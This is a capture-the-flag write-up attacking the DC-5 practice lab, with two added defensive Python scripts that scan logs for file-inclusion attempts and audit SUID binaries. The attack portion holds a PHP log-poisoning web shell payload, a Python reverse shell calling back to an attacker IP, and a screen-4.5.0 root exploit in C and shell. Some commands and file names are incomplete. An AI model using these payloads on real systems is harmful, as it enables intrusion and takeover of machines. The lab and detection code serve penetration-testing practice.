Hack. Sleep. Repeat



DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

The plan was for DC-5 to kick it up a notch, so this might not be great for beginners, but should be ok for people with intermediate or better experience. Time will tell (as will feedback).

As far as I am aware, there is only one exploitable entry point to get in (there is no SSH either). This particular entry point may be quite hard to identify, but it is there. You need to look for something a little out of the ordinary (something that changes with a refresh of a page). This will hopefully provide some kind of idea as to what the vulnerability might involve.

And just for the record, there is no phpmailer exploit involved. :-)

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

We always start with an nmap scan.

nmap -sC -sV -p- -oA nmap <Target-IP>

# Nmap 7.91 scan initiated Thu May 27 05:45:51 2021 as: nmap -sC -p- -sV -oA nmap
Nmap scan report for DC-5 (
Host is up (0.0015s latency).
Not shown: 65532 closed ports
80/tcp    open  http    nginx 1.6.2
|_http-server-header: nginx/1.6.2
|_http-title: Welcome
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          47835/udp   status
|   100024  1          51334/udp6  status
|   100024  1          52216/tcp   status
|_  100024  1          54172/tcp6  status
52216/tcp open  status  1 (RPC #100024)

Service detection performed. Please report any incorrect results at .
# Nmap done at Thu May 27 05:46:08 2021 -- 1 IP address (1 host up) scanned in 16.99 seconds

Scanning the full port range gives us three open ports, but since the lab focuses on port 80 (HTTP), let's hit it to start enumerating.


We are on the webpage; let's look around for something vulnerable. After spending some time checking, I landed on the contact page.


Let's try to contact them and also check for SQL injection, but nope, that's not the way in. Checking the URL we get after sending them a message, it looks like LFI, right? Sounds interesting.


Not going to lie, getting the right parameter is a real pain, but we learn something every day. It is something simple, but my mind was not set there at all, so let's continue. The right parameter here is file, found by guessing, which took me a long time.


LFI to Shell Through Log Poisoning

We know our web server is nginx, so poisoning it is easy since we know the log path with the help of a little research on Google.

Let's intercept our request with Burp and send it to the Repeater tab in Burp, inserting <?php system ($_GET['rev']) ?>


Let's confirm whether we poisoned it.


Boom, we definitely did. Let's run some commands back in Burp: /var/log/nginx/error.log&rev=ls is the path I am talking about, with the little twist (the rev parameter) that we added when poisoning the web server.
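As an added example (not part of the original write-up), here is a small Python scanner over constructed nginx access-log lines that flags the two behaviours seen above from the defender's side: LFI probes of the file parameter and a PHP open tag arriving in a request so that it lands in the log. The /thanks.php path and the log lines are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed nginx access-log lines for this example (not from DC-5 itself).
# /thanks.php is a hypothetical name for the page that takes the file parameter.
SAMPLE_LINES = [
    '10.0.0.5 - - [27/May/2021:05:50:01 +0000] "GET /thanks.php?file=footer.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [27/May/2021:05:50:09 +0000] "GET /thanks.php?file=../../../../etc/passwd HTTP/1.1" 200 1832 "-" "Mozilla/5.0"',
    # the PHP tag from the write-up, URL-encoded in the path so that nginx logs it
    '10.0.0.5 - - [27/May/2021:05:50:40 +0000] "GET /%3C?php%20system($_GET[\'rev\'])%20?%3E HTTP/1.1" 404 168 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [27/May/2021:05:51:22 +0000] "GET /thanks.php?file=/var/log/nginx/error.log&rev=ls HTTP/1.1" 200 9021 "-" "Mozilla/5.0"',
]

# Request targets that reach outside the web root or into log files.
LFI_PATTERNS = [
    re.compile(r'\.\./'),                      # directory traversal
    re.compile(r'=/(?:etc|var/log|proc)/'),    # parameter set to an absolute sensitive path
]
# Any PHP open tag anywhere in the logged line (path, referrer or User-Agent).
PHP_TAG = re.compile(r'<\?(?:php|=)', re.IGNORECASE)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

def classify_line(line):
    """Return the set of finding labels for one access-log line."""
    decoded = unquote(line)          # undo %2e%2e%2f style encoding first
    findings = set()
    m = REQUEST.search(decoded)
    target = m.group(1) if m else ''
    if any(p.search(target) for p in LFI_PATTERNS):
        findings.add('lfi')
    if PHP_TAG.search(decoded):
        findings.add('log-poisoning')
    return findings

def scan(lines):
    """Return [(line_number, sorted labels)] for every suspicious line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        labels = classify_line(line)
        if labels:
            hits.append((number, sorted(labels)))
    return hits

if __name__ == '__main__':
    for number, labels in scan(SAMPLE_LINES):
        print(f'line {number}: {", ".join(labels)}')
```

Feed it the real access.log with scan(open('/var/log/nginx/access.log')) to see which requests would have seeded the error.log before it was ever included.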


Getting Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<Attacker-IP>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

NOTE: edit the port and IP and start an ncat listener; now let's run it to get our shell.


Shell below:


Spawning a TTY shell makes the shell stable and also so cool to use; I know, I love using the word cool, lol.

python -c 'import pty; pty.spawn("/bin/bash")' and I think we are good to go.


Checking all the folders found nothing, so I decided to check for SUID binaries with find / -perm -u=s -type f 2>/dev/null to list out SUID files.


Seems we have /bin/screen-4.5.0; let's check for an exploit.
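A defender-side counterpart to the SUID hunt above, added here and not taken from the write-up: a Python audit that lists set-user-ID regular files and reports any that are not on a baseline allowlist, so an odd entry such as /bin/screen-4.5.0 stands out. The allowlist and the sample entries are constructed for the example.

```python
import os
import stat

# Constructed baseline of SUID binaries expected on a typical Debian-style host
# (adapt it to the host's own package set before relying on it).
EXPECTED_SUID = {
    "/bin/su", "/bin/mount", "/bin/umount", "/usr/bin/passwd", "/usr/bin/sudo",
    "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp",
}

def is_suid(mode):
    """True when mode describes a regular file with the set-user-ID bit set."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)

def unexpected_suid(entries, expected=EXPECTED_SUID):
    """entries: iterable of (path, st_mode). Return SUID paths missing from the baseline."""
    return sorted(path for path, mode in entries if is_suid(mode) and path not in expected)

def walk_files(root="/"):
    """Yield (path, st_mode) for every regular file under root, skipping pseudo-filesystems;
    this is the Python equivalent of the find / -perm -u=s -type f walk from the write-up."""
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath.startswith(("/proc", "/sys", "/dev", "/run")):
            dirnames[:] = []        # do not descend into kernel-backed trees
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks while auditing
            except OSError:
                continue
            yield path, st.st_mode

# Constructed sample: 0o104755 = regular file, SUID bit, rwxr-xr-x.
SAMPLE_ENTRIES = [
    ("/bin/su", 0o104755),
    ("/usr/bin/passwd", 0o104755),
    ("/bin/screen-4.5.0", 0o104755),   # the odd one out on DC-5
    ("/bin/ls", 0o100755),             # not SUID, must be ignored
]

if __name__ == "__main__":
    for path in unexpected_suid(walk_files()):
        print("unexpected SUID binary:", path)
```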



Privilege Escalation

What we have to do now is create the exploit we already have, but we have some fixing to do.


Now let's do the right thing.

#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>   /* chmod */
#include <unistd.h>     /* chown */
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    printf("[+] done!\n");
}

Let's save it in a file named exploit.c

#include <stdio.h>
#include <unistd.h>     /* execvp */
int main(void){
    execvp("/bin/sh", NULL);   /* execvp(file, argv): two arguments */
}

Let's save it in a file named rootshell.c

echo "[+] Now we create our /etc/ file..."
cd /etc
umask 000 # because
screen -D -m -L echo -ne  "\x0a/tmp/" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so... 

Let's save it in a file named


Now we need to compile them.

gcc -fPIC -shared -ldl -o exploit.c
gcc -o rootshell rootshell.c


Now let's upload them to the target.


We have all the files on the target; now let's give the file with the name execute permission with chmod +x, and then run it.


Rooooooooooooooooooot! Let's now get the flag.txt.


Box rooted and we are done.

Greetings from Muzec
